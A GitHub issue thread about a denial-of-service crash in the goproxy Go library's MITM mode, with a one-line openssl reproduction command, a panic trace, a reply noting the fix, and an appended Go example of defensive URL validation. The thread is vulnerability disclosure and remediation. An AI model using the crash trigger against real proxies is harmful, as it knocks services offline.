elazarl / goproxy

An HTTP proxy library for Go
BSD 3-Clause "New" or "Revised" License

goproxy v1.1 was discovered to contain an issue which can lead to Denial of Service (DoS) via unspecified vectors #502

Closed g0ku704 closed 1 year ago

g0ku704 commented 1 year ago

An HTTP request to an HTTPS page with the path "/" replaced by an asterisk "*" crashes the elazarl/goproxy server in MITM mode.

The vulnerability can be triggered by running this command against elazarl/goproxy in MITM mode.

echo -e "GET * HTTP/1.1\r\n" | openssl s_client -proxy localhost:8000 -connect "localhost:8000" -ign_eof

Similar to this:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x6b3260]

goroutine 1287 [running]:
github.com/elazarl/goproxy.(*ProxyHttpServer).handleHttps.func2()
        /go/pkg/mod/github.com/elazarl/goproxy@v0.0.0-20221015165544-a0805db90819/https.go:249 +0xd60
created by github.com/elazarl/goproxy.(*ProxyHttpServer).handleHttps
        /go/pkg/mod/github.com/elazarl/goproxy@v0.0.0-20221015165544-a0805db90819/https.go:211 +0x611

https://github.com/elazarl/goproxy/blob/master/https.go#L249

danmanor commented 1 year ago

Is this issue resolved?

g0ku704 commented 1 year ago

Is this issue resolved?

Yes, I've added a nil check that was causing the crash and merged with the main branch now. But the release package is not updated yet. (https://github.com/elazarl/goproxy/pull/507)
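The following is an added example, not part of the original thread and not goproxy's code. It shows how Go's standard library treats the asterisk-form target from the report and how a proxy can reject it instead of ending up with a nil URL. It assumes a proxy that rebuilds an absolute URL by concatenating the CONNECT host and the request target; the function names `rebuildUnchecked` and `readTunneledRequest` are hypothetical.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"net/http"
	"net/url"
	"strings"
)

// rebuildUnchecked shows the failure mode: the parse error is dropped, so an
// unparsable target leaves the caller holding a nil *url.URL.
func rebuildUnchecked(connectHost, target string) *url.URL {
	u, _ := url.Parse("https://" + connectHost + target)
	return u
}

// readTunneledRequest parses one request from inside a CONNECT tunnel and
// rebuilds its absolute URL. connectHost is the host:port of the CONNECT line.
func readTunneledRequest(raw, connectHost string) (*http.Request, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return nil, fmt.Errorf("read request: %w", err)
	}
	// net/http parses the asterisk-form target "*" for any method; RFC 9112
	// defines it only for a server-wide OPTIONS, so refuse it here.
	if req.URL.Path == "*" {
		return nil, errors.New("asterisk-form request target not supported")
	}
	abs, err := url.Parse("https://" + connectHost + req.URL.String())
	if err != nil {
		return nil, fmt.Errorf("rebuild URL: %w", err) // abs is nil here
	}
	req.URL = abs
	return req, nil
}

func main() {
	// Constructed sample input, mirroring the request line in the report.
	fmt.Println("unchecked rebuild is nil:", rebuildUnchecked("localhost:8000", "*") == nil)
	_, err := readTunneledRequest("GET * HTTP/1.1\r\n\r\n", "localhost:8000")
	fmt.Println("checked path returns:", err)
}
```

With a host:port such as `localhost:8000`, appending `*` produces an invalid port, so `url.Parse` returns a nil URL together with an error; any later field access on that URL panics unless the error is handled.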